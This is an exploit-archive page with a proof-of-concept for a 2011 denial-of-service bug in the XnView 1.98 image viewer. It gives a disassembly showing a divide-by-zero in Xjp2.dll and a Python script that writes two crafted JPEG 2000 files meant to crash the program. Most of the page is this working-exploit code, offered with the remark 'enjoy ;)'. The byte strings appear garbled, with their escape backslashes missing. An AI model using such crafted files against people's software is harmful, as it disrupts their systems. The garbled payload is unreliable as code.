XnView 1.98 Denial of Service Vulnerability PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XnView 1.98 Denial of Service Vulnerability PoC
# Published : 2011-06-20
# Author :
# Previous Title : Microsoft Office XP Remote code Execution
# Next Title : Windows Explorer 6.0.2900.5512 (Shmedia.dll 6.0.2900.5512) AVI Preview DoS PoC
# done by BraniX
# found: 2011.06.19
# published: 2011.06.20
# tested on: Windows XP SP3 Home Edition
# tested on: Windows XP SP3 Professional

# App: XnView 1.98 (latest version)
# App Url: http://www.xnview.com
# xnview.exe    MD5: ebe200d81a095d296e94e887dc40e607
# Xjp2.dll      MD5: 0c831c090f5a723d44bb641b175ca0e6

# DoS is caused by integer division by zero in module Xjp2.dll

# It can be triggered from:
# Local: C:XnView 1.98 JP2000 (Compression 50%) DoS.jp2
# Remote: \MySecretServerXnView 1.98 JP2000 (Compression 50%) DoS.jp2

# 1000D1C4    8A44BA 03       MOV AL,BYTE PTR DS:[EDX+EDI*4+3]
# 1000D1C8    8941 E4         MOV DWORD PTR DS:[ECX-1C],EAX
# 1000D1CB    8B56 0C         MOV EDX,DWORD PTR DS:[ESI+C]
# 1000D1CE    8D4413 FF       LEA EAX,DWORD PTR DS:[EBX+EDX-1]
# 1000D1D2    33D2            XOR EDX,EDX
# 1000D1D4    F7F3            DIV EBX                                  ; div by zero
# 1000D1D6    33D2            XOR EDX,EDX
# 1000D1D8    8BE8            MOV EBP,EAX
# 1000D1DA    8B46 04         MOV EAX,DWORD PTR DS:[ESI+4]
# 1000D1DD    8D4403 FF       LEA EAX,DWORD PTR DS:[EBX+EAX-1]
# 1000D1E1    F7F3            DIV EBX
# 1000D1E3    8B59 E4         MOV EBX,DWORD PTR DS:[ECX-1C]

filepath = "C:\XnView 1.98 JP2000 (Compression 50%) DoS.jp2"
f = open(filepath, "wb")
poc = 'x00x00x00x0Cx6Ax50x20x20x0Dx0Ax87x0Ax00x00x00x14x66x74x79x70x6Ax70x32x20x00x00x00x00x6Ax70x32x20x00x00x00x2Dx6Ax70x32x68x00x00x00x16x69x68x64x72x00x00x00x0Dx00x00x00x0Bx00x03x07x07x00x00x00x00x00x0Fx63x6Fx6Cx72x01x00x00x00x00x00x10x00x00x00x00x6Ax70x32x63xFFx4FxFFx51x00x2Fx00x00x00x00x00x0Bx00x00x00x0Dx00x00x00x00x00x00x00x00x00x00x00x0Bx00x00x00x0Dx00x00x00x00x00x00x00x00x00x03x07x00x00x07x01x01x07x01x01xFFx5Cx00x17x42x60xC8x42x5Dx42x5Dx42x6Dx3AxDBx3AxDBx3Bx35x32xB8x32xB8x32x6BxFFx5Dx00x18x01x42x60x6Dx41xF2x41xF2x42x01x3Ax6Bx3Ax6Bx3AxC1x32x49x32x49x31xFFxFFx5Dx00x18x02x42x61xAAx43x69x43x69x43x7Ax3BxF3x3BxF3x3Cx56x33xCCx33xCCx33x78xFFx52x00x0Cx00x00x00x01x01x03x04x04x00x00xFFx64x00x0Fx00x01x4Cx57x46x5Fx4Ax50x32x5Fx32x30x37xFFx90x00x0Ax00x00x00x00x00xA7x00x01xFFx93xC7xECx0Cx08x8AxC1xC5xD6x54xC0x7Dx40xA0x0BxBFx3Bx6FxDFxC1xF8x02x80x03x97x3Dx32x8BxC0xF8x42x87xCEx12x07xC2x10x01x7Fx0Cx31x03x6Bx0BxE3xA0x10x80x01xC0x74x18x1Fx08x60x04x0Cx41x6FxC3xE4x13x07xC2x34x1Fx08x80x1CxDDxFDx75xB0xA9x74x39x3Fx0Dx31x97xD9xD9x7Fx0CxACxCDx9FxC0xE8x60x1Fx92xE7xC0xE8xB0x3Ax1Cx04x40x1Fx1ExA0x20x67x12x9Ax3Fx0CxA7xC3xE1x2Ax0Ex93x07x45x61x1Cx5ExC3xDDxACx1BxF5x5BxB9x03x8AxADxF5x07x1Fx86x1Dx5Fx19xD8x05x13xA3xC0x84x5FxC0x8Ax04x80x01x7Fx03x9Cx46xBFxFFxD9'
f.write(poc)
f.close()

print "Done, 1st file generated on 'C:\' ..."
print "Open this file in XnView 1.98 and enjoy ;)"

filepath = "C:\XnView 1.98 JP2000 (Lossless Compression) DoS.jp2"
f = open(filepath, "wb")
poc = 'x00x00x00x0Cx6Ax50x20x20x0Dx0Ax87x0Ax00x00x00x14x66x74x79x70x6Ax70x32x20x00x00x00x00x6Ax70x32x20x00x00x00x2Dx6Ax70x32x68x00x00x00x16x69x68x64x72x00x00x00x0Dx00x00x00x0Bx00x03x07x07x00x00x00x00x00x0Fx63x6Fx6Cx72x01x00x00x00x00x00x10x00x00x00x00x6Ax70x32x63xFFx4FxFFx51x00x2Fx00x00x00x00x00x0Bx00x00x00x0Dx00x00x00x00x00x00x00x00x00x00x00x0Bx00x00x00x0Dx00x00x00x00x00x00x00x00x00x03x07x01x01x00x00x01x07x01x01xFFx5Cx00x0Dx40x40x48x48x50x48x48x50x48x48x50xFFx52x00x0Cx00x00x00x01x01x03x04x04x00x01xFFx64x00x0Fx00x01x4Cx57x46x5Fx4Ax50x32x5Fx32x30x37xFFx90x00x0Ax00x00x00x00x01xD7x00x01xFFx93xC7xD4x0Ax0BxC7x38x51x7FxC3xE7x06x05x37xD2xC7xD4x0Ax03x99xA5x4Cx37xC1xF3x83x8FxB4x16x0FxA8x0Cx02x3Ex7Fx0Cx36xBBx62x2Fx0BxCCx17xC0x7Cx21x40x7Cx21xC0x7Cx80x80x04x3Fx00x8Cx5Fx08x4BxC1xF3x83x87xD4x0Bx03xE7x06x03x86x7Fx0Cx3Fx54xA0x7Fx08xC3x3FxC7xDAx19x0FxA8x26x1Fx68x50x1Dx1Cx3DxBBxD4xFCx81x39x8FxA6x70x69x0Dx31x7Dx53xE7xDBx76x1BxBFx0CxACx1Bx93x78xD2xF9xD4xA4x4FxC1xF3x8Ax81xF2x07x80xF9x03x80x1Cx55x34xA2x49xD7xFBx27x22x0Fx01xA7xB1x0Ax1Fx87x4Fx04x72xC3xEExE0x5Cx7FxC1xF3x8Cx87xD4x13x07xD4x10x11x7BxFCx98xB8x1Fx71x08x68xBEx09x3Fx0Bx4Fx2Bx89x58x56x5ExD9xF3x0CxACx7Ax0Ex4Bx8CxDAx19xC3xEAx1Dx87xD4x3Dx07xD4x30x4Fx4DxF3xDDx3Bx9Ex30xC2x67xC8xBEx80x42x86xA2x9Dx6Ex6Cx29x29x2BxDDxF5x71x5ExD4x7DxE4x5Fx03x8AxAEx0Dx74xDAxBAxD1x3FxD2x58x2Fx8Dx45x36x7BxF4x45xC1x95x14xDBx5Dx6Ex1Cx49xC8xC2x72xDFx1ExE9x2Fx2CxBCxC7xAAx56x9ExA9x73xFDxA7xEBxEBx43x78x20x08x39xEEx07xCEx2BxC1xF3x99x83xE7x33x03xE7x2Ex5FxECx62x95x14x7CxE1xB1x36x06xEEx8Dx1BxB8xD9xFCx4Cx12x2Dx5FxA2xA1x7Cx80xFDx3Dx57x59xB9x1BxCDx48x78xB4xC6x7FxC3x73x32x8Fx6Ex38x51x45xCDxC7xDAxEDx54x5Bx09xC2xC1x85xF6x0Bx9CxEFx38x79x10x72x31x80x43x0Dx75x99x95x9CxE6x44x7FxC1xF3x9Ex87xD4x3Dx03xE7x2Ex11x88x13x57x4Ex51x31x2DxBFx76xECx3Ex42x3CxF9xA6x5Dx7Dx96x05xF0xA9xA0x9Ex69x4CxBFx71xA3xBFx03x89x78x67x57xF0xBBxD2x32x12x88x9CxD3x41xF6x81xEDx3Ex2Ex35x62xF1x69xDAxC2x71x0FxABx14x1Bx16x55xACx51x83x1Ex48x2Ex20xC8x39x1Ax46x12xE1x62x07x88x8Cx43x20x1Ax1BxFFxD9'
f.write(poc)
f.close()

print "Done, 2nd file generated on 'C:\' ..."
print "Open this file in XnView 1.98 and enjoy ;)"